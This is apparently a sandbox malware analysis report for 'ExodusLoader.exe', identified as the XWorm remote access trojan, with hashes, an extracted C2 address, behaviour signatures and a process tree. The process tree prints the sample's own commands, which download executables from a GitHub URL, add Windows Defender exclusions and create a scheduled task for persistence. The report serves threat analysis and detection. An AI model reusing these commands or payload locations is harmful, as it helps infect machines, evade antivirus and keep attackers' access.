Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

ExodusLoader.exe

windows7-x64

8

ExodusLoader.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10/03/2025, 00:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ExodusLoader.exe

  • Size

    89KB

  • MD5

    2f3405fa61bec944ed9d869adb6a37e3

  • SHA1

    4a3c839b899809ba89a99eaadecf4da6d71e8256

  • SHA256

    ee854407da3d172d442c9aec8861d9e8fd4f7a5f8c4cbb785d7e55549a507234

  • SHA512

    72c8309a2c439adb3790aaf7198d5cdfa5591703a039ca84982752dfc43213a94885aab5a82fc0cfd78e161a792d2c1684e0cae7e4e7d772cc98be4aabdc33c0

  • SSDEEP

    1536:77fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfAwWOn:X7DhdC6kzWypvaQ0FxyNTBfAg

Score
10/10
xwormdiscoveryexecutionrattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

137.184.74.73:5000

Mutex

Y2rnj2CSRObOXXLb

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    System.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Powershell Invoke Web Request.

    execution
  • Downloads MZ/PE file 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of FindShellTrayWindow 28 IoCs
  • Suspicious use of SendNotifyMessage 28 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe
    "C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1996
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B26.tmp\B27.tmp\B28.bat C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4184
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/ExodusInject.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe'"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5036
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/Exodus.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Exodus.exe'"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4104
      • C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe
        "C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1368
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\AggregatorHost.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2976
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AggregatorHost.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4364
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3F94.tmp.bat""
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1480
          • C:\Windows\system32\timeout.exe
            timeout 3
            5⤵
            • Delays execution with timeout.exe
            PID:2632
      • C:\Users\Admin\AppData\Local\Temp\Exodus.exe
        "C:\Users\Admin\AppData\Local\Temp\Exodus.exe"
        3⤵
        • Executes dropped EXE
        PID:2752
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3984
  • C:\Users\Admin\AppData\Roaming\AggregatorHost.exe
    C:\Users\Admin\AppData\Roaming\AggregatorHost.exe
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:216
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\ProgramData\System.exe"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:4516
  • C:\ProgramData\System.exe
    C:\ProgramData\System.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4212
  • C:\ProgramData\System.exe
    C:\ProgramData\System.exe
    1⤵
    • Executes dropped EXE
    PID:1484
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:3892

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    2f57fde6b33e89a63cf0dfdd6e60a351

    SHA1

    445bf1b07223a04f8a159581a3d37d630273010f

    SHA256

    3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

    SHA512

    42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    c20ac38ae3022e305b8752804aadf486

    SHA1

    4c144d6cfafb5c37ab4810ff3c1744df81493cdb

    SHA256

    03cba7e903a418a3966af1dc0debfb5fcfb2ac6d372ec48cb1b93c23e0fd1caf

    SHA512

    c9def9e5cd09d19b8b47a3f4c61893da715a6ba4b9933c885386d0425ee4ccc30d75eac1097511619d4e6259a46581f803fb38f78a15339391e4e78b0b6153e0

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    f207d3477daf0aef7a648894b1d2c350

    SHA1

    4c83f0cd9d0d1979f878ba1f405a58c709ce76a5

    SHA256

    266f722786a8728760dd91ee7e725e5b4ca4a7069d9b1bfe75a07cee7e499f99

    SHA512

    0a6b8036ec756df140ca3d3a9c960843306e90fe99cd4e6b9d8091f005337417b83f52d77f8473800d92ed5d8121c3bddc4341be4e8caa004929eb1ff0fd21b0

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    5aedc324791c152dbe2855e534991c3c

    SHA1

    3f8ecd8cbcbd9abb6c3ee4abce5e4ecf929fedf7

    SHA256

    a29256d13aada8ff63532405f5d36610fc565e76f1c1bda347ed9d37e0ee8386

    SHA512

    f945f492b1e7955fe900768a1609b528c2bc8a9afe668343096fe6cd38fbd7cd52ba41ff86d1ea559bbf6faeb3084198f5be266c3136100c3764b037afa71135

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\B26.tmp\B27.tmp\B28.bat
    Filesize

    491B

    MD5

    54436d8e8995d677f8732385734718bc

    SHA1

    246137700bee34238352177b56fa1c0f674a6d0b

    SHA256

    20c5e5f392f2ad19b9397fd074d117c87ca3da37f1151736dbd20322ea7e12c3

    SHA512

    57ffc0f920bbaf36bbd22ea90c14670f44766e4b81509f54b1dec1be4443e51d8bf0997198de0851e1ea4993e5d786e21c9c1f7f17c792da88eb6bb4a324f448

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Exodus.exe
    Filesize

    507KB

    MD5

    470ccdab5d7da8aafc11490e4c71e612

    SHA1

    bc540c0ba7dcb0405a7b6c775f0a1b585d51c4b3

    SHA256

    849c0420722c1dabb927ff0ab70375bc1197ba73a7f04885460b609392bd319c

    SHA512

    6b3a09b785c02a57f6330cd6610f8a78b1f6a1689c14a190a9af4ad4ab4666f8a77d75c4c85a3af04693effdc970440ce8d62a4132f66471aaa250f9d90f2f7b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe
    Filesize

    227KB

    MD5

    38b7704d2b199559ada166401f1d51c1

    SHA1

    3376eec35cd4616ba8127b976a8667e7a0aac87d

    SHA256

    153825af8babb75361f4af359bfdd5e95cbdc7f263db5c4e70ac1da8f36bc564

    SHA512

    07b828073c8f80c5498501c8f64decb5effa702c8bc3d60a2f7d5de36d493b469cbbf413fb0c92c0aadd6ee139bfb75f3b9e936230212d42e57d2ec5671e9b27

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e0t21wir.2tn.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\tmp3F94.tmp.bat
    Filesize

    164B

    MD5

    5fdb4a5bc50c0c1e4630b0a21153b995

    SHA1

    98039344d82d4daa9bd6f2159aea2558885e3baa

    SHA256

    4f7586c1417898a84fd2f3c5178cd1d752c05f1b923a2e183277764687897921

    SHA512

    461f356b9b696fd71fd67402f5b3f2d282c768a6bfdb6a44efe5923c73b4c0ea25c8db488d677675807053439d3dd8ba9903353fd3a7ddbaa372fa35b0420797

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk
    Filesize

    665B

    MD5

    6bdd747c4603e86696149d82dc31ee9c

    SHA1

    b113350eccee3a242e518328fa4f65c1a99c57e6

    SHA256

    b4b053ea0ad2698f1f0bc63df9f29eb26d82e1f2f4d61af1dc98e3eb28db709c

    SHA512

    858efffc489d26d4540590452132609288503b48e4e74281de7544c58a7f8ed79a2d4af6536e0d4f6b24a17b42466d5e7c33f30f9165f9f822777d21ca2084de

    Download Submit

  • memory/216-71-0x0000000003100000-0x000000000310E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/1368-40-0x0000000000440000-0x0000000000480000-memory.dmp

    Filesize

    256KB

    Download

  • memory/3892-91-0x00000200D5D30000-0x00000200D5D31000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3892-90-0x00000200D5D30000-0x00000200D5D31000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3892-87-0x00000200D5D30000-0x00000200D5D31000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3892-88-0x00000200D5D30000-0x00000200D5D31000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3892-89-0x00000200D5D30000-0x00000200D5D31000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3892-83-0x00000200D5D30000-0x00000200D5D31000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3892-92-0x00000200D5D30000-0x00000200D5D31000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3892-81-0x00000200D5D30000-0x00000200D5D31000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3892-82-0x00000200D5D30000-0x00000200D5D31000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3892-93-0x00000200D5D30000-0x00000200D5D31000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4104-21-0x00007FFDC62D0000-0x00007FFDC6D91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4104-34-0x00007FFDC62D0000-0x00007FFDC6D91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4104-20-0x00007FFDC62D0000-0x00007FFDC6D91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5036-3-0x00000267AEDC0000-0x00000267AEDE2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/5036-13-0x00007FFDC62D0000-0x00007FFDC6D91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5036-14-0x00007FFDC62D0000-0x00007FFDC6D91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5036-18-0x00007FFDC62D0000-0x00007FFDC6D91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5036-2-0x00007FFDC62D3000-0x00007FFDC62D5000-memory.dmp

    Filesize

    8KB

    Download